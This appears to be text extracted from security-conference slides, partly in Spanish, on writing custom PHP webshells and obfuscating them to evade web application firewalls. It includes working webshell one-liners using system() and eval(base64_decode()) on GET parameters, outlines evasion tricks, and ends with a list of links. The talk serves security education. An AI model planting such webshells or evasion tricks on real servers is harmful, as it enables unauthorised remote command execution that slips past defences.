TENGO UN PERRO QUE

SE LLAMA WAF

jomoza@wafbypass:/home/bitup# cat talk | more

jomoza@wafbypass:/home/bitup# whoami

Josep Moreno (JoMoZa).@j0moz4youtube.com/loveisinthenet[*] loveisinthe.net

@bitupalicante [*] bitupalicante.com

jomoza@wafbypass:/home/bitup# cat talk | more

Webshell uploaded...

5 MINS AFTER...

jomoza@wafbypass:/home/bitup# cat talk | more

404

jomoza@wafbypass:/home/bitup# cat talk | more

If you ask about public webshells...

- Can include bad thinks

(minners, ...)

- Can include obfuscated

functions

(Functionalityless)

- IDS/WAF Detection

jomoza@wafbypass:/home/bitup# cat talk | more

Make your own webshell and 4 that...

jomoza@wafbypass:/home/bitup# cat talk | more

let’s talk about ofuscation php , vulnerable

functions and some bash tricks..

jomoza@wafbypass:/home/bitup# cat talk | more

IT’S A BIND SHELL

jomoza@wafbypass:/home/bitup# cat talk | more

IT’S A BIND SHELL

Apache, NGINX, Tomcat….Firefox, Chrome,....

webshells...<?php

echo system($_GET[“cmd”]);?>

RCE

<?phpecho system($_GET[“cmd”]);

?>

RCE:

# Remote CODE Execution

(Application context: “asp, jsp, php... functions)

webshells...

<?phpecho system($_GET[“cmd”]);

?>

RCE:

# Remote CODE Execution

(Application context: “asp, jsp, php... functions)

# Remote COMMAND Execution

(System context: “bash, sh, cmd,...”)

webshells...

jomoza@wafbypass:/home/bitup# php -c rce

https://stackoverflow.com/questions/3115559/exploitable-php-functions

jomoza@wafbypass:/home/bitup# cat talk | more

🖥

LeT’s OfUsCaTe

SyStEm() FuN

jomoza@wafbypass:/home/bitup# fileless like webshell

jomoza@wafbypass:/home/bitup#./makeitcool “system()”

PONER COMENTARIOS Y HEX

http://php.net/manual/en/functions.variable-functions.php

https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/

CONCATENATED STRING

USING DEFINED FUNCTIONS

/*SINGLE STRING CHARACTER*/

https://secure.php.net/manual/es/language.operators.string.php

APPLICATION

CONTEXT.

jomoza@wafbypass:/home/bitup# php “<?php rce; ?>”https://stackoverflow.com/questions/3115559/exploitable-php-functions

https://github.com/lcatro/PHP-WebShell-Bypass-WAF

FILELESS ARE YOU?

https://github.com/lcatro/PHP-WebShell-Bypass-WAF

jomoza@wafbypass:/home/bitup# fileless like webshell

<?php eval(base64_decode($_GET["bcode"]));

?>

https://github.com/lcatro/PHP-WebShell-Bypass-WAF

FILELESS ARE YOU?

jomoza@wafbypass:/home/bitup# fileless like webshell

jomoza@wafbypass:/home/bitup# fileless like webshell

#2

SYSTEM

CONTEXT.

jomoza@wafbypass:/home/bitup# cat talk | more

jomoza@wafbypass:/home/bitup# cat talk | more

jomoza@wafbypass:/home/bitup# cat talk | more

DEMO #3

jomoza@wafbypass:/home/bitup# bash globbing

$ php -r 'echo "hello"." world"."\n";'

hello world

jomoza@wafbypass:/home/bitup# string literal concatenationhttps://unix.stackexchange.com/questions/10263/how-to-concatenate-string-variables-into-a-third

jomoza@wafbypass:/home/bitup# undefined variableshttps://www.secjuice.com/web-application-firewall-waf-evasion/

jomoza@wafbypass:/home/bitup# ./metamorphws start

jomoza@wafbypass:/home/bitup# curl “http://bibliography”

https://medium.com/secjuice/waf-evasion-techniques-718026d693d8https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0https://www.secjuice.com/web-application-firewall-waf-evasion/https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/

https://github.com/lcatro/PHP-WebShell-Bypass-WAFhttps://github.com/PortSwigger/bypass-wafhttps://stackoverflow.com/questions/3115559/exploitable-php-functionshttps://es.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour

@j0moz4

@bitupalicante